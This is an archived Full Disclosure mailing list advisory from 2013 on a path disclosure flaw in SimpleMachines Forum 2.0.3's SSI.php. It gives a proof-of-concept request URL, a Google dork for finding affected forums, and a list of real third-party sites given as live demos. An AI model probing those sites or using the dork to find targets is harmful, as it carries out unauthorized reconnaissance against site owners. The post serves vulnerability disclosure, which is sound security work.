Full Disclosure mailing list archives
Path Disclusore in SimpleMachines Forum <= 2.0.3
From: WHK Yan <yan.uniko.102 () gmail com>
Date: Thu, 3 Jan 2013 11:35:08 -0300
*Summary:* -------------- A security flaw allows an attacker to know the full path of the web system. *Details: ----------- *SSI.php Line 294: // Fetch a post with a particular ID. By default will only show if you have permission to the see the board in question - this can be overriden. function ssi_fetchPosts($post_ids, $override_permissions = false, $output_method = 'echo') { $post_id is not defined. Possible fix: ($post_id = false) *PoC: ------- *http://example.com/forumpath/SSI.php?ssi_function=fetchPosts *Google Dorks: --------------------- *inurl:?index.php?action=help *Demos: ----------- *http://simpleportal.net/SSI.php?ssi_function=fetchPosts http://www.furgovw.org/SSI.php?ssi_function=fetchPosts http://www.teachmideast.com/forum_old/SSI.php?ssi_function=fetchPosts http://www.slowracing.com/jaxfox/SSI.php?ssi_function=fetchPosts http://www.iptv2you.com/board/SSI.php?ssi_function=fetchPosts http://voceteopr.com/SSI.php?ssi_function=fetchPosts http://www.thesilverball.com/SSI.php?ssi_function=fetchPosts http://othforums.com/SSI.php?ssi_function=fetchPosts http://www.skinmod.eu/SSI.php?ssi_function=fetchPosts Referer and Mirror: ------------------------- http://whk.drawcoders.net/index.php/topic,2792.0.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Path Disclusore in SimpleMachines Forum <= 2.0.3 WHK Yan (Jan 04)